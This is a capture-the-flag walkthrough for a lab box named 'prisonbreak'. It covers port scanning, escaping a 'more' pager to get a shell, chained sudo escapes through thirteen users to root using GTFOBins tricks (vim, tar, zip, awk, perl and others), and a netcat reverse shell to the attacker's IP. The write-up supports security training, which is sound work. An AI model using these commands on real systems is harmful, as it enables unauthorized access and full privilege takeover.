# prisonbreak There's also a video version, if you want to check it out: [prisonbreak](https://youtu.be/49v6HfC61W4?feature=shared) **Port Scanning** First we perform a port scan using Rustscan to identify open ports. ``` rustscan -a 10.0.200.47 .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- Real hackers hack time ⌛ Open 10.0.200.47:22 Open 10.0.200.47:1337 ``` Once we know what ports are open, we use nmap to obtain the services and their versions running on these ports. ``` ❯ nmap -p22,1337 -sCV -n -Pn -v 10.0.200.47 -oN scan Nmap scan report for 10.0.200.47 Host is up (0.15s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0) | ssh-hostkey: | 2048 39:d8:72:f0:6f:74:58:78:ea:2b:e4:06:b9:82:67:65 (RSA) | 256 55:8b:25:46:3d:72:08:35:46:23:4f:4c:fa:70:ba:a7 (ECDSA) |_ 256 10:ce:b4:58:a2:c3:59:5b:0f:e7:91:e3:6a:04:fb:4e (ED25519) 1337/tcp open waste? | fingerprint-strings: | GenericLines, NULL: | [?1049h | [?1h | MORE(1) User Commands MORE(1) ``` * `-p ` * `-sCV combines the options -sC and -sV.` * nmap help: * `-sC: equivalent to --script=default` * `-sV: Probe open ports to determine service/version info` * `-n: Never do DNS resolution` * `-vvv: Increase verbosity level` * `-oN : Output scan in normal format.` Port 22 is running SSH, but Nmap cannot determine the service on port 1337, so we'll need to identify it manually. **Gaining access** Using Netcat to connect to port 1337, we receive the manual for the "more" command. We can escape from this environment by pressing `Esc` and then typing `:!bash`. After pressing Enter, we obtain a shell.

**Upgrading shell** To upgrade the shell, we execute the following command: `script /dev/null -qc bash` Next, press `Ctrl+Z` and then run: `stty raw -echo; fg` Finally, reset the terminal: `reset xterm` With the shell back, execute: `export TERM=xterm` And adjust the terminal size with: `stty rows 44 cols 172` #### Horizontal privilege escalation **cell2 user** With the shell as the "cell1" user, execute: `sudo -l` * `sudo -l, --list` list user's privileges.

You see that we can execute `more` as the "cell2" user. Elevate privileges by running: `sudo -u cell2 more /etc/passwd` (or any other existent file). Press `Esc` followed by `:!bash`, just as before, to become the "cell2" user.

Having done this we are "cell2" user. **cell3 user** Run `sudo -l` again, and you'll see that you can execute `less` as the "cell3" user.

Searching on Google, we found [this resource](https://gtfobins.github.io/gtfobins/less/#sudo) that explains how to escape from `less` using `sudo`. Follow this process: `sudo -u cell3 /usr/bin/less /etc/passwd` Escape pressing escape then write `:!bash` to switch to the "cell3" user.

**cell4 user** As the "cell3" user, run `sudo -l`:

Note that you can execute `nmap` as the "cell4" user. Searching for ways to escalate privileges with `nmap`, we found [this method on GTFObins](https://gtfobins.github.io/gtfobins/nmap/#sudo) to execute commands: First we have to be in a world readable directory like `/tmp`, here execute the following commands: `echo 'os.execute("/bin/bash")' > test` `sudo -u cell4 /usr/bin/nmap --script test` You now have access as "cell4".

**cell5 user** As "cell4", run: `sudo -l`

To escalate to "cell5", we found [this GTFObins resource](https://gtfobins.github.io/gtfobins/awk/#sudo). Execute: `sudo -u cell5 /usr/bin/awk 'BEGIN {system("/bin/bash")}'`

This way now we are `cell5`. **cell6 user** For "cell6", execute `sudo -l`:

To gain access as "cell6", you can use the method outlined [here](https://gtfobins.github.io/gtfobins/find/#sudo): `sudo -u cell6 /usr/bin/find . -exec /bin/bash \; -quit`

After executing this command we are `cell6`. **cell7 user** Run `sudo -l` as "cell6":

This user can use sudo to execute vim as `cell7`, use this method found on [GTFObins](https://gtfobins.github.io/gtfobins/vim/#sudo). `sudo -u cell7 /usr/bin/vim -c ':!/bin/bash'`

And you'll be `cell7`. **cell8 user** For "cell8", execute `sudo -l`:

So execute: `sudo -u cell8 /usr/bin/links /etc/passwd` then press `Esc` twice, hit Enter, select the option to spawn an OS shell.

And you are now `cell8.` ![](https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FZf21W8okR2PXpA6hU7fm%2FPasted%20image%2020240807145758.png?alt=media\&token=028f2dbf-1032-447f-acc8-4ae73f0ba0fc) **cell9 user** Being "cell8" execute `sudo -l`:

This user can execute `/usr/bin/lynx` as "cell9". Following the steps from this [resource](https://0xffsec.com/handbook/shells/restricted-shells/#lynxlynx-doc), execute: `sudo -u cell9 /usr/bin/lynx /etc/passwd`, then enter the options with `o`.

Change the `Editor` to `/usr/bin/vim`.

Accept the changes.

Finally press "e" to enter the editor, and escape from Vim by pressing `Esc` followed by `:!bash`.

**cell10 user** Execute `sudo -l`:

`cell9` can execute `/usr/bin/zip` as `cell10`. To escalate privileges use this method was found on [GTFObins](https://gtfobins.github.io/gtfobins/zip/#sudo). `sudo -u cell10 /usr/bin/zip /tmp/test /etc/hosts -T -TT 'bash #'`

**cell11 user** As "cell10", run: `sudo -l`

`cell10` can execute `/bin/tar` as `cell11`. There's this method to execute commands on [GTFObins](https://gtfobins.github.io/gtfobins/tar/#sudo). `sudo -u cell11 /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash`

**cell12 user** Execute `sudo -l`:

`cell11`can execute `/usr/bin/mutt` as `cell12`, so execute: `sudo -u cell12 /usr/bin/mutt` To escape, press `Esc` followed by `!`.

Here enter `bash` to get a shell, as explained in [this resource](https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/).

**cell13 user** As "cell12", execute `sudo -l`:

To escalate to cell13 execute: `sudo -u cell13 /usr/bin/pinfo` Press `!` to open a shell prompt within pinfo.

Set up a listener on another tab: `nc -nlvp 443` In the pinfo shell prompt, create a reverse shell: `nc -e /bin/bash 443` Replace `` with your actual IP address. In your listener terminal, you should receive a connection.

Upgrade the shell: `script /dev/null -qc bash` then press Ctrl+z and immediatelly execute the command: `stty raw -echo;fg`

Finally execute `reset xterm`

You are now `cell13`. ![](https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2F1PrsPUP913hq788Ov6zm%2FPasted%20image%2020240807154306.png?alt=media\&token=940f8032-18d1-4deb-88ea-f93a8ea5b0da) **root user** As cell13, execute `sudo -l`:

`cell13` can execute `/usr/bin/perl` as root. This method on [GTFObins](https://gtfobins.github.io/gtfobins/perl/#sudo)shows us how to execute commands: `sudo /usr/bin/perl -e 'exec "/bin/bash";'`

Congratulations! You now have root access. The flags can be found in: * /root * /etc/shadow * /proc/1/environ * The home directory of every "cell" user.